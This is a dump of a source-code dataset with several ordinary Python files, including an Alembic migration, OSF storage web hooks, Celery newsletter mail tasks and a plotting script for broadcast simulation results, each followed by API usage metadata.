"call"}, {"api_name": "troposphere.Ref", "line_number": 73, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 74, "usage_type": "call"}, {"api_name": "troposphere.NoValue", "line_number": 74, "usage_type": "argument"}, {"api_name": "troposphere.Select", "line_number": 74, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 74, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 75, "usage_type": "call"}, {"api_name": "troposphere.NoValue", "line_number": 75, "usage_type": "argument"}, {"api_name": "troposphere.Select", "line_number": 75, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 75, "usage_type": "call"}, {"api_name": "troposphere.efs.MountTarget", "line_number": 81, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 83, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 83, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 83, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 84, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 85, "usage_type": "call"}, {"api_name": "troposphere.efs.MountTarget", "line_number": 91, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 93, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 93, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 93, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 94, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 95, "usage_type": "call"}, {"api_name": "troposphere.Output", "line_number": 101, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 104, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 104, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 104, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "335574117", "text": "\"\"\"empty message\n\nRevision ID: fabf2ca39860\nRevises: 6beff7876a3a\nCreate Date: 2018-04-16 15:43:09.997566\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fabf2ca39860'\ndown_revision = '6beff7876a3a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('pre_shared_keys',\n sa.Column('attr_id', sa.Integer(), nullable=False),\n sa.Column('device_id', sa.String(length=8), nullable=False),\n sa.Column('psk', sa.Binary(), nullable=False),\n sa.ForeignKeyConstraint(['attr_id'], ['attrs.id'], ),\n sa.ForeignKeyConstraint(['device_id'], ['devices.id'], ),\n sa.PrimaryKeyConstraint('attr_id', 'device_id')\n )\n op.create_unique_constraint(None, 'devices', ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'devices', type_='unique')\n op.drop_table('pre_shared_keys')\n # ### end Alembic commands ###\n", "sub_path": "migrations/versions/fabf2ca39860_.py", "file_name": "fabf2ca39860_.py", "file_ext": "py", "file_size_in_byte": 1074, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "alembic.op.create_table", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Binary", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 35, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 35, "usage_type": "name"}, {"api_name": "alembic.op.drop_table", "line_number": 36, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "230771870", "text": "from __future__ import unicode_literals\n\nimport httplib\nimport logging\n\nfrom modularodm.exceptions import NoResultsFound\nfrom modularodm.storage.base import KeyExistsException\n\nfrom framework.auth import Auth\nfrom framework.exceptions import HTTPError\nfrom framework.auth.decorators import must_be_signed\nfrom framework.transactions.handlers import no_auto_transaction\n\nfrom website.models import User\nfrom website.project.decorators import (\n must_not_be_registration, must_have_addon,\n)\nfrom website.util import rubeus\nfrom website.project.model import has_anonymous_link\n\nfrom website.models import NodeLog\nfrom website.addons.osfstorage import model\nfrom website.addons.osfstorage import utils\nfrom website.addons.osfstorage import errors\nfrom website.addons.osfstorage import settings as osf_storage_settings\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef make_error(code, message_short=None, message_long=None):\n data = {}\n if message_short:\n data['message_short'] = message_short\n if message_long:\n data['message_long'] = message_long\n return HTTPError(code, data=data)\n\n\n@must_be_signed\n@utils.handle_odm_errors\n@must_have_addon('osfstorage', 'node')\ndef osf_storage_download_file_hook(node_addon, payload, **kwargs):\n try:\n path = payload['path'].strip('/')\n version_id = int(payload.get('version', 0)) - 1\n except KeyError:\n raise make_error(httplib.BAD_REQUEST, 'Path is required')\n except ValueError:\n raise make_error(httplib.BAD_REQUEST, 'Version must be an int or not specified')\n\n storage_node = model.OsfStorageFileNode.get_file(path, node_addon)\n if storage_node.is_deleted:\n raise HTTPError(httplib.GONE)\n\n version = storage_node.get_version(version_id)\n\n if payload.get('mode') != 'render':\n if version_id < 0:\n version_id = len(storage_node.versions) + version_id\n utils.update_analytics(node_addon.owner, storage_node._id, version_id)\n\n return {\n 'data': {\n 'name': storage_node.name,\n 'path': version.location_hash,\n },\n 'settings': {\n osf_storage_settings.WATERBUTLER_RESOURCE: version.location[osf_storage_settings.WATERBUTLER_RESOURCE],\n },\n }\n\n\ndef osf_storage_crud_prepare(node_addon, payload):\n try:\n auth = payload['auth']\n settings = payload['settings']\n metadata = payload['metadata']\n hashes = payload['hashes']\n worker = payload['worker']\n path = payload['path'].strip('/')\n except KeyError:\n raise HTTPError(httplib.BAD_REQUEST)\n user = User.load(auth.get('id'))\n if user is None:\n raise HTTPError(httplib.BAD_REQUEST)\n location = settings\n location.update({\n 'object': metadata['name'],\n 'service': metadata['provider'],\n })\n # TODO: Migrate existing worker host and URL\n location.update(worker)\n metadata.update(hashes)\n return path, user, location, metadata\n\n\n@must_be_signed\n@no_auto_transaction\n@must_have_addon('osfstorage', 'node')\ndef osf_storage_upload_file_hook(node_addon, payload, **kwargs):\n\n if osf_storage_settings.DISK_SAVING_MODE:\n raise HTTPError(httplib.METHOD_NOT_ALLOWED)\n\n path, user, location, metadata = osf_storage_crud_prepare(node_addon, payload)\n path = path.split('/')\n\n if len(path) > 2:\n raise HTTPError(httplib.BAD_REQUEST)\n\n try:\n parent, child = path\n except ValueError:\n parent, (child, ) = node_addon.root_node, path\n\n if not isinstance(parent, model.OsfStorageFileNode):\n parent = model.OsfStorageFileNode.get_folder(parent, node_addon)\n\n try:\n created, record = False, parent.find_child_by_name(child)\n except NoResultsFound:\n created, record = True, parent.append_file(child)\n\n code = httplib.CREATED if created else httplib.OK\n version = record.create_version(user, location, metadata)\n\n return {\n 'status': 'success',\n 'path': record.path,\n 'version': version._id,\n 'downloads': record.get_download_count(),\n }, code\n\n\n@must_be_signed\n@must_have_addon('osfstorage', 'node')\ndef osf_storage_update_metadata_hook(node_addon, payload, **kwargs):\n try:\n version_id = payload['version']\n metadata = payload['metadata']\n except KeyError:\n raise HTTPError(httplib.BAD_REQUEST)\n\n version = model.OsfStorageFileVersion.load(version_id)\n\n if version is None:\n raise HTTPError(httplib.NOT_FOUND)\n\n version.update_metadata(metadata)\n\n return {'status': 'success'}\n\n\n@must_be_signed\n@utils.handle_odm_errors\n@must_not_be_registration\n@must_have_addon('osfstorage', 'node')\ndef osf_storage_crud_hook_delete(payload, node_addon, **kwargs):\n try:\n path = payload['path'].strip('/')\n except KeyError:\n raise make_error(httplib.BAD_REQUEST, 'Path is required')\n\n storage_node = model.OsfStorageFileNode.get(path, node_addon)\n\n if storage_node == node_addon.root_node:\n raise HTTPError(httplib.BAD_REQUEST)\n\n if storage_node.is_deleted:\n raise HTTPError(httplib.GONE)\n\n try:\n auth = Auth(User.load(payload['auth'].get('id')))\n if not auth:\n raise HTTPError(httplib.BAD_REQUEST)\n storage_node.delete(auth)\n except errors.DeleteError:\n raise HTTPError(httplib.NOT_FOUND)\n\n storage_node.save()\n return {'status': 'success'}\n\n\n@must_be_signed\n@utils.handle_odm_errors\n@must_have_addon('osfstorage', 'node')\ndef osf_storage_get_metadata_hook(node_addon, payload, **kwargs):\n path = payload.get('path')\n\n if not path:\n raise HTTPError(httplib.BAD_REQUEST)\n\n if path == '/':\n fileobj = node_addon.root_node\n else:\n fileobj = model.OsfStorageFileNode.get(path.strip('/'), node_addon)\n\n if fileobj.is_deleted:\n raise HTTPError(httplib.GONE)\n\n if fileobj.kind == 'file':\n data = fileobj.serialized()\n data['fullPath'] = fileobj.materialized_path()\n return data\n\n return [\n child.serialized()\n for child in fileobj.children\n if not child.is_deleted\n ]\n\n\ndef osf_storage_root(node_settings, auth, **kwargs):\n \"\"\"Build HGrid JSON for root node. Note: include node URLs for client-side\n URL creation for uploaded files.\n \"\"\"\n node = node_settings.owner\n root = rubeus.build_addon_root(\n node_settings=node_settings,\n name='',\n permissions=auth,\n user=auth.user,\n nodeUrl=node.url,\n nodeApiUrl=node.api_url,\n )\n return [root]\n\n\n@must_be_signed\n@utils.handle_odm_errors\n@must_have_addon('osfstorage', 'node')\ndef osf_storage_get_revisions(payload, node_addon, **kwargs):\n node = node_addon.owner\n path = payload.get('path')\n is_anon = has_anonymous_link(node, Auth(private_key=payload.get('view_only')))\n\n if not path:\n raise HTTPError(httplib.BAD_REQUEST)\n\n record = model.OsfStorageFileNode.get(path.strip('/'), node_addon)\n\n # Return revisions in descending order\n return {\n 'revisions': [\n utils.serialize_revision(node, record, version, index=len(record.versions) - idx - 1, anon=is_anon)\n for idx, version in enumerate(reversed(record.versions))\n ]\n }\n\n\n@must_be_signed\n@utils.handle_odm_errors\n@must_have_addon('osfstorage', 'node')\ndef osf_storage_create_folder(payload, node_addon, **kwargs):\n path = payload.get('path')\n user = User.from_cookie(payload.get('cookie', ''))\n\n if not path or not user:\n raise HTTPError(httplib.BAD_REQUEST)\n\n split = path.strip('/').split('/')\n child = split.pop(-1)\n\n if not child:\n raise HTTPError(httplib.BAD_REQUEST)\n\n if split:\n parent = model.OsfStorageFileNode.get(split[0], node_addon)\n else:\n parent = node_addon.root_node\n\n try:\n folder = parent.append_folder(child)\n except KeyExistsException:\n folder = parent.find_child_by_name(child, kind='folder')\n if not folder.is_deleted:\n raise HTTPError(httplib.CONFLICT, data={\n 'message': 'Cannot create folder \"{name}\" because a file or folder already exists at path \"{path}\"'.format(\n name=folder.name,\n path=folder.materialized_path(),\n )\n })\n folder.undelete(Auth(user), recurse=False)\n folder.log(Auth(user), NodeLog.FOLDER_CREATED)\n\n return folder.serialized(), httplib.CREATED\n", "sub_path": "website/addons/osfstorage/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 8460, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 28, "usage_type": "call"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 37, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 48, "usage_type": "attribute"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 50, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode.get_file", "line_number": 52, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode", "line_number": 52, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 52, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 54, "usage_type": "call"}, {"api_name": "httplib.GONE", "line_number": 54, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.utils.update_analytics", "line_number": 61, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.utils", "line_number": 61, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.settings.WATERBUTLER_RESOURCE", "line_number": 69, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.settings", "line_number": 69, "usage_type": "name"}, {"api_name": "framework.auth.decorators.must_be_signed", "line_number": 40, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.utils.handle_odm_errors", "line_number": 41, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.utils", "line_number": 41, "usage_type": "name"}, {"api_name": "website.project.decorators.must_have_addon", "line_number": 42, "usage_type": "call"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 83, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 83, "usage_type": "attribute"}, {"api_name": "website.models.User.load", "line_number": 84, "usage_type": "call"}, {"api_name": "website.models.User", "line_number": 84, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 86, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 86, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.settings.DISK_SAVING_MODE", "line_number": 103, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.settings", "line_number": 103, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 104, "usage_type": "call"}, {"api_name": "httplib.METHOD_NOT_ALLOWED", "line_number": 104, "usage_type": "attribute"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 110, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 110, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode", "line_number": 117, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 117, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode.get_folder", "line_number": 118, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode", "line_number": 118, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 118, "usage_type": "name"}, {"api_name": "modularodm.exceptions.NoResultsFound", "line_number": 122, "usage_type": "name"}, {"api_name": "httplib.CREATED", "line_number": 125, "usage_type": "attribute"}, {"api_name": "httplib.OK", "line_number": 125, "usage_type": "attribute"}, {"api_name": "framework.auth.decorators.must_be_signed", "line_number": 98, "usage_type": "name"}, {"api_name": "framework.transactions.handlers.no_auto_transaction", "line_number": 99, "usage_type": "name"}, {"api_name": "website.project.decorators.must_have_addon", "line_number": 100, "usage_type": "call"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 143, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 143, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileVersion.load", "line_number": 145, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileVersion", "line_number": 145, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 145, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 148, "usage_type": "call"}, {"api_name": "httplib.NOT_FOUND", "line_number": 148, "usage_type": "attribute"}, {"api_name": "framework.auth.decorators.must_be_signed", "line_number": 136, "usage_type": "name"}, {"api_name": "website.project.decorators.must_have_addon", "line_number": 137, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 163, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode.get", "line_number": 165, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode", "line_number": 165, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 165, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 168, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 168, "usage_type": "attribute"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 171, "usage_type": "call"}, {"api_name": "httplib.GONE", "line_number": 171, "usage_type": "attribute"}, {"api_name": "framework.auth.Auth", "line_number": 174, "usage_type": "call"}, {"api_name": "website.models.User.load", "line_number": 174, "usage_type": "call"}, {"api_name": "website.models.User", "line_number": 174, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 176, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 176, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.errors.DeleteError", "line_number": 178, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.errors", "line_number": 178, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 179, "usage_type": "call"}, {"api_name": "httplib.NOT_FOUND", "line_number": 179, "usage_type": "attribute"}, {"api_name": "framework.auth.decorators.must_be_signed", "line_number": 155, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.utils.handle_odm_errors", "line_number": 156, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.utils", "line_number": 156, "usage_type": "name"}, {"api_name": "website.project.decorators.must_not_be_registration", "line_number": 157, "usage_type": "name"}, {"api_name": "website.project.decorators.must_have_addon", "line_number": 158, "usage_type": "call"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 192, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 192, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode.get", "line_number": 197, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode", "line_number": 197, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 197, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 200, "usage_type": "call"}, {"api_name": "httplib.GONE", "line_number": 200, "usage_type": "attribute"}, {"api_name": "framework.auth.decorators.must_be_signed", "line_number": 185, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.utils.handle_odm_errors", "line_number": 186, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.utils", "line_number": 186, "usage_type": "name"}, {"api_name": "website.project.decorators.must_have_addon", "line_number": 187, "usage_type": "call"}, {"api_name": "website.util.rubeus.build_addon_root", "line_number": 219, "usage_type": "call"}, {"api_name": "website.util.rubeus", "line_number": 219, "usage_type": "name"}, {"api_name": "website.project.model.has_anonymous_link", "line_number": 236, "usage_type": "call"}, {"api_name": "framework.auth.Auth", "line_number": 236, "usage_type": "call"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 239, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 239, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode.get", "line_number": 241, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode", "line_number": 241, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 241, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.utils.serialize_revision", "line_number": 246, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.utils", "line_number": 246, "usage_type": "name"}, {"api_name": "framework.auth.decorators.must_be_signed", "line_number": 230, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.utils.handle_odm_errors", "line_number": 231, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.utils", "line_number": 231, "usage_type": "name"}, {"api_name": "website.project.decorators.must_have_addon", "line_number": 232, "usage_type": "call"}, {"api_name": "website.models.User.from_cookie", "line_number": 257, "usage_type": "call"}, {"api_name": "website.models.User", "line_number": 257, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 260, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 260, "usage_type": "attribute"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 266, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 266, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode.get", "line_number": 269, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode", "line_number": 269, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 269, "usage_type": "name"}, {"api_name": "modularodm.storage.base.KeyExistsException", "line_number": 275, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 278, "usage_type": "call"}, {"api_name": "httplib.CONFLICT", "line_number": 278, "usage_type": "attribute"}, {"api_name": "framework.auth.Auth", "line_number": 284, "usage_type": "call"}, {"api_name": "framework.auth.Auth", "line_number": 285, "usage_type": "call"}, {"api_name": "website.models.NodeLog.FOLDER_CREATED", "line_number": 285, "usage_type": "attribute"}, {"api_name": "website.models.NodeLog", "line_number": 285, "usage_type": "name"}, {"api_name": "httplib.CREATED", "line_number": 287, "usage_type": "attribute"}, {"api_name": "framework.auth.decorators.must_be_signed", "line_number": 252, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.utils.handle_odm_errors", "line_number": 253, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.utils", "line_number": 253, "usage_type": "name"}, {"api_name": "website.project.decorators.must_have_addon", "line_number": 254, "usage_type": "call"}]} +{"seq_id": "285584925", "text": "# -*- encoding:utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom arrow import utcnow\nfrom flask import render_template\nfrom flask.ext.mail import Message\n\nfrom ..extensions import db, mail\nfrom ..models import Newsletter\nfrom .env import celery, logger\n\n\n@celery.task(ignore_result=True)\ndef validate_mails():\n records = Newsletter.query.\\\n filter(Newsletter.validate_ts.is_(None)).\\\n filter(Newsletter.last_mail.is_(None)).\\\n all()\n\n for record in records:\n msg = Message()\n msg.subject = \"Bestätigung zur Aufnahme in den Newsletter\"\n msg.add_recipient(record.email)\n msg.body = render_template(\"mail/newsletter_validate.txt\", hash=record.validate_hash)\n msg.send(mail)\n\n record.last_mail = utcnow().datetime\n db.session.add(record)\n db.session.commit()\n\n logger.info(\"validate mail send to: %s\" % msg.recipients[0])\n\n\n@celery.task(ignore_result=True)\ndef welcome_mails():\n records = Newsletter.query.\\\n filter(Newsletter.validate_ts.isnot(None)).\\\n filter(Newsletter.last_mail.isnot(None)).\\\n filter(Newsletter.last_mail < Newsletter.validate_ts).\\\n all()\n\n for record in records:\n msg = Message()\n msg.subject = \"Willkommen beim BestellerKING Newsletter\"\n msg.add_recipient(record.email)\n msg.body = render_template(\"mail/newsletter_welcome.txt\")\n msg.send(mail)\n\n record.last_mail = utcnow().datetime\n db.session.add(record)\n db.session.commit()\n\n logger.info(\"welcome mail send to: %s\" % msg.recipients[0])\n", "sub_path": "app/tasks/newsletter.py", "file_name": "newsletter.py", "file_ext": "py", "file_size_in_byte": 1716, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "models.Newsletter.query.filter", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Newsletter.query", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.Newsletter", "line_number": 19, "usage_type": "name"}, {"api_name": "models.Newsletter.validate_ts.is_", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Newsletter.validate_ts", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Newsletter", "line_number": 20, "usage_type": "name"}, {"api_name": "models.Newsletter.last_mail.is_", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Newsletter.last_mail", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.Newsletter", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.ext.mail.Message", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 28, "usage_type": "call"}, {"api_name": "extensions.mail", "line_number": 29, "usage_type": "argument"}, {"api_name": "arrow.utcnow", "line_number": 31, "usage_type": "call"}, {"api_name": "extensions.db.session.add", "line_number": 32, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 32, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 32, "usage_type": "name"}, {"api_name": "extensions.db.session.commit", "line_number": 33, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 33, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 33, "usage_type": "name"}, {"api_name": "env.logger.info", "line_number": 35, "usage_type": "call"}, {"api_name": "env.logger", "line_number": 35, "usage_type": "name"}, {"api_name": "env.celery.task", "line_number": 17, "usage_type": "call"}, {"api_name": "env.celery", "line_number": 17, "usage_type": "name"}, {"api_name": "models.Newsletter.query.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Newsletter.query", "line_number": 40, "usage_type": "attribute"}, {"api_name": "models.Newsletter", "line_number": 40, "usage_type": "name"}, {"api_name": "models.Newsletter.validate_ts.isnot", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Newsletter.validate_ts", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.Newsletter", "line_number": 41, "usage_type": "name"}, {"api_name": "models.Newsletter.last_mail.isnot", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Newsletter.last_mail", "line_number": 42, "usage_type": "attribute"}, {"api_name": "models.Newsletter", "line_number": 42, "usage_type": "name"}, {"api_name": "models.Newsletter.last_mail", "line_number": 43, "usage_type": "attribute"}, {"api_name": "models.Newsletter", "line_number": 43, "usage_type": "name"}, {"api_name": "models.Newsletter.validate_ts", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.ext.mail.Message", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 50, "usage_type": "call"}, {"api_name": "extensions.mail", "line_number": 51, "usage_type": "argument"}, {"api_name": "arrow.utcnow", "line_number": 53, "usage_type": "call"}, {"api_name": "extensions.db.session.add", "line_number": 54, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 54, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 54, "usage_type": "name"}, {"api_name": "extensions.db.session.commit", "line_number": 55, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 55, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 55, "usage_type": "name"}, {"api_name": "env.logger.info", "line_number": 57, "usage_type": "call"}, {"api_name": "env.logger", "line_number": 57, "usage_type": "name"}, {"api_name": "env.celery.task", "line_number": 38, "usage_type": "call"}, {"api_name": "env.celery", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "419723746", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\n\ndef preprocess(para_list, dic):\n rounds_data_list = []\n for para in para_list:\n rounds_data_list.append(dic[para])\n return rounds_data_list\n\n\ndef std_avg_graph():\n para_u = [0, 6, 12, 24, 48, 96, 188]\n para_r = [0, 16, 32, 48, 64, 96, 128, 256, 512, 768]\n\n u_data_dict = pickle.load(open(\"uni_data_1000_\", \"rb\"))\n r_data_dict = pickle.load(open(\"ratio_data_1000_\", \"rb\"))\n\n data_to_plot_u = preprocess(para_u, u_data_dict)\n\n data_to_plot_r = preprocess(para_r, r_data_dict)\n\n fig = plt.figure(1, figsize=(9, 6))\n\n # Create an axes instance\n ax = fig.add_subplot(111)\n\n # Create the boxplot\n bp = ax.boxplot(data_to_plot_r, showmeans=True, labels=para_r)\n plt.xlabel(\"Number_Of_Trusted_Nodes\")\n plt.ylabel(\"Number of Rounds\")\n plt.title(\"Ratio_Distributed_Good_Nodes_In_Random_Case\")\n plt.show()\n\n\ndef alg_compare_graph(result_dict):\n for num_trusted, small_dict in result_dict.items():\n for alg_label, rounds_list in small_dict.items():\n if alg_label == 0:\n plt.plot(list(range(len(rounds_list))), rounds_list, 'r--', label='DEGREE_CENTRALITY')\n elif alg_label == 1:\n plt.plot(list(range(len(rounds_list))), rounds_list, 'b--', label='EIGEN_CENTRALITY')\n elif alg_label == 2:\n plt.plot(list(range(len(rounds_list))), rounds_list, 'g--', label='CLOSENESS_CENTRALITY')\n elif alg_label == 3:\n plt.plot(list(range(len(rounds_list))), rounds_list, 'y--', label='BETWEENNESS_CENTRALITY')\n elif alg_label == 4:\n plt.plot(list(range(len(rounds_list))), rounds_list, 'c--', label='UNIFORM_TOTAL')\n elif alg_label == 5:\n plt.plot(list(range(len(rounds_list))), rounds_list, 'm--', label='UNIFORM_SUB')\n elif alg_label == 6:\n plt.plot(list(range(len(rounds_list))), rounds_list, 'k--', label='WEIGHTED_EDGEs')\n plt.xticks(np.arange(0, len(rounds_list), 1.0))\n plt.legend(loc='best')\n plt.title(f\"number of trusted node : {num_trusted}\")\n plt.savefig(f\"testing_int{num_trusted}\")\n plt.clf()\n\n\n# key: number of trusted\n# value: small dict:\n # key: algorithm name\n # number of rounds\nif __name__ == '__main__':\n result_dict = pickle.load(open(\"/Users/yingjianwu/Desktop/broadcast/Broadcast_py/result_dict_0123.pickle\", \"rb\"))\n result_dict_456 = pickle.load(open(\"/Users/yingjianwu/Desktop/broadcast/Broadcast_py/result_dict_456.pickle\", \"rb\"))\n\n for k, v in result_dict_456.items():\n small_dict_in_result_dict = result_dict[k]\n for a, b in v.items():\n small_dict_in_result_dict[a] = b\n alg_compare_graph(result_dict)", "sub_path": "Graph.py", "file_name": "Graph.py", "file_ext": "py", "file_size_in_byte": 2800, "program_lang": 